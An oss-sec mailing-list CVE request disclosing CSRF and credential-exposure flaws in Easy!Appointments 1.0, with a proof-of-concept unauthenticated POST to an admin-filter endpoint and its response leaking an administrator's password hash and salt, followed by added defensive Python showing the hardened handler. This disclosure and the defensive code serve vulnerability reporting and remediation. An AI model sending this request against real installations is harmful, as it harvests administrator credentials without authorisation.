oss-sec mailing list archives

CVE request: Easy!Appointments 1.0 Cross-Site Request Forgery and Insufficiently Protected Credentials vulnerabilities


From: Henri Salo <henri () nerv fi>
Date: Mon, 27 Jul 2015 16:14:21 +0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: Easy!Appointments Open Source Appointment Scheduler
Product URL: http://easyappointments.org/
Vendor: Alex Tselegidis
Vulnerability Type:
    Cross-Site Request Forgery (CWE-352)
    Insufficiently Protected Credentials (CWE-522)
Vulnerable Versions: 1.0
Fixed Version: next release
Vendor Notification: 2015-04-03
Solution Status: Fixed by vendor
Solution Date: 2015-05-28
Public Disclosure: 2015-07-27

Vulnerability Details:

The web application does not sufficiently verify whether a well-formed, valid,
consistent request was intentionally provided by the user who submitted the
request. The application transmits all user credentials to an unauthenticated
user and possibly allows other unauthorized actions.

Proof-of-concept without authentication:

"""
POST /ea/backend_api/ajax_filter_admins HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Iceweasel/31.6.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://example.com/ea/backend/users
Content-Length: 4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

key=
"""

Returns:

"""
HTTP/1.1 200 OK
Date: Thu, 09 Apr 2015 10:28:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.4.39-0+deb7u2
Set-Cookie: ci_session=*removed*; expires=Thu, 09-Apr-2015 12:28:38 GMT; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 539

[{"id":"84","first_name":"Henri","last_name":"Salo","email":"email () example 
com","mobile_number":null,"phone_number":"04012345678","address":null,"city":null,"state":null,"zip_code":null,"notes":null,"id_roles":"1","settings":{"username":"henri","password":"1f40f9a5d17bedf197274fcc1886ef6ef4015b0f883513782d6fa437f8ab9af7","salt":"547ca602bda6a2a97ff4222fb71d61c75436da1ebf86a41c33219d11f1f4568e","working_plan":null,"notifications":"0","google_sync":"0","google_token":null,"google_calendar":null,"sync_past_days":"5","sync_future_days":"5"}}]
"""

Fixed in following commit:
    https://github.com/alextselegidis/easyappointments/commit/1f73e7fcbc2c06505178200567ac905ae8570326

Related commits to add CSRF protection:
    https://github.com/alextselegidis/easyappointments/commit/f223ffa343ad91d046b4469248f6479edf1718d7
    https://github.com/alextselegidis/easyappointments/commit/daf4865c290c58b66f73507a0ae1ec41987ad840
    https://github.com/alextselegidis/easyappointments/commit/d88c138d2dd35820e355f0d7f3b93db3cc5473e8
    https://github.com/alextselegidis/easyappointments/commit/ad8c9b6522c560ac5b6309f62f8b3e2319483d54
    https://github.com/alextselegidis/easyappointments/commit/ecbe5600df03ac970e4e743215d3b3be6e1e6860

References:
    https://scapsync.com/cwe/CWE-352
    https://scapsync.com/cwe/CWE-522
    https://cwe.mitre.org/data/definitions/352.html
    https://cwe.mitre.org/data/definitions/522.html
    https://en.wikipedia.org/wiki/Cross-site_request_forgery
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet

- -- 
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJVti6tAAoJECet96ROqnV0mlwP/R82KPUH15elyTfqeImCsc/6
FpUiZrvQPvW2saPlweec6vLsdr361dZb3wfSLpltyDK/b/XFhRxGOqufjETDfsrr
tP5y7OqvpzKisu+itOpsFBiFppuLD3UCK2GsWyFM0JHrcSkOyG5dKQ1LGkQzZObD
vG2U6ofB7PRoW0C9iorlUVa7InUt9sEWojwjsONtacbibiLD4jIqui1YUs0Dg9yj
QUTBKd8RcSUddkZYzhKIkhBYgdaMdSO1ObE1taLZlK2lfQCI9L5pAXAf4k8YRP5X
N+wiX6LfmVcb+8Os0iJpsFZLT9oe0B3Kl1elm51MWFyA00P5M7B8x3svkeH34LUH
OBDyE92+LH352zn9nDIpZFeEwoEZTEZak5zAKM0L1i+qXU9LRwwZXahFvY4VyZng
mvqf4tZEogJV55q27HaWr1595b7MEHBexiNQmFrC5k9l2fFzVZRnlaIHLYjGvwpf
vSFHG8u/YpSmOOM3FM/yRZlgR21jM2cdYIDs5vpQkGfjdSW61CdQwp6m/j1znkqH
jjxYiqIhp9me4xEWmAhgm26HkQcpCHlEBwA2N2x9RvnS/Lw6oPHln8dxhu4OP3mr
Eq43X2Zz8kQJkZuQnufAzmtMYxvKmzhfVYWREBzhohox+nXImqlAvYxzCQzBEGBE
++lf9BJDbx+CMendxx9Z
=cYYp
-----END PGP SIGNATURE-----
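The advisory above shows a backend JSON endpoint that answers unauthenticated requests and serialises each administrator's password hash and salt along with the record. The following is an added example, written for this archive page and not code from the advisory or from the Easy!Appointments project, of how such a handler is hardened against both reported issues: it refuses requests without an authenticated admin session, verifies a per-session synchronizer CSRF token in constant time, and redacts credential fields before serialising (CWE-522). The names (`handle_filter_admins`, `ADMIN_ROLE_ID`, `csrf_token`) and the in-memory user table are assumptions made for the example; the record values are constructed and contain no real hashes.

```python
"""Hardened model of a backend "filter admins" JSON endpoint.

Added example for the advisory above, not Easy!Appointments' own code.
Identifiers and the sample user table are assumptions for the example.
"""
import hmac
import json
import secrets

ADMIN_ROLE_ID = "1"               # assumption: id_roles "1" is administrator
CSRF_FIELD = "csrf_token"         # assumption: form field carrying the token
CREDENTIAL_FIELDS = {"password", "salt", "google_token"}

# Constructed user table shaped like the advisory's response; values invented.
USERS = [
    {
        "id": "84", "first_name": "Henri", "last_name": "Salo",
        "email": "admin@example.com", "id_roles": "1",
        "settings": {
            "username": "henri",
            "password": "<hash-placeholder>",
            "salt": "<salt-placeholder>",
            "working_plan": None, "notifications": "0",
        },
    },
    {
        "id": "85", "first_name": "Pat", "last_name": "Provider",
        "email": "pat@example.com", "id_roles": "2",
        "settings": {"username": "pat", "password": "<hash-placeholder>",
                     "salt": "<salt-placeholder>"},
    },
]


def new_session(user_id, role_id):
    """Server-side session that binds a random CSRF token to the login."""
    return {"user_id": user_id, "role_id": role_id,
            CSRF_FIELD: secrets.token_hex(32)}


def redact_user(user):
    """Copy of a user record with credential material stripped from settings."""
    clean = dict(user)
    clean["settings"] = {k: v for k, v in user.get("settings", {}).items()
                         if k not in CREDENTIAL_FIELDS}
    return clean


def handle_filter_admins(request, session):
    """Return (status, body) for a request shaped {"method": str, "form": dict}.

    session is the dict from new_session(), or None when the browser presented
    no valid session cookie.
    """
    # 1. Require an authenticated administrator; the reported endpoint did not.
    if session is None or session.get("role_id") != ADMIN_ROLE_ID:
        return 401, {"error": "authentication required"}
    if request.get("method") != "POST":
        return 405, {"error": "POST required"}
    # 2. Synchronizer-token CSRF check against the session-bound token,
    #    compared in constant time on the encoded bytes.
    sent = request.get("form", {}).get(CSRF_FIELD, "")
    if not hmac.compare_digest(sent.encode(), session[CSRF_FIELD].encode()):
        return 403, {"error": "invalid CSRF token"}
    # 3. Apply the caller's "key" filter, then redact before serialising.
    key = request.get("form", {}).get("key", "").lower()
    matches = [
        u for u in USERS
        if u["id_roles"] == ADMIN_ROLE_ID
        and key in f'{u["first_name"]} {u["last_name"]} {u["email"]}'.lower()
    ]
    return 200, [redact_user(u) for u in matches]


def render(status, body):
    """Serialise a handler result as (status, headers, text) with a JSON type."""
    return status, {"Content-Type": "application/json"}, json.dumps(body)


if __name__ == "__main__":
    sess = new_session("84", ADMIN_ROLE_ID)
    req = {"method": "POST", "form": {"key": "", CSRF_FIELD: sess[CSRF_FIELD]}}
    print(render(*handle_filter_admins(req, sess)))
```

The empty `key=` body from the advisory is the interesting input: with no filter the handler returns every administrator, so the redaction step is what keeps the hash and salt out of the response even for a legitimately authenticated caller.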

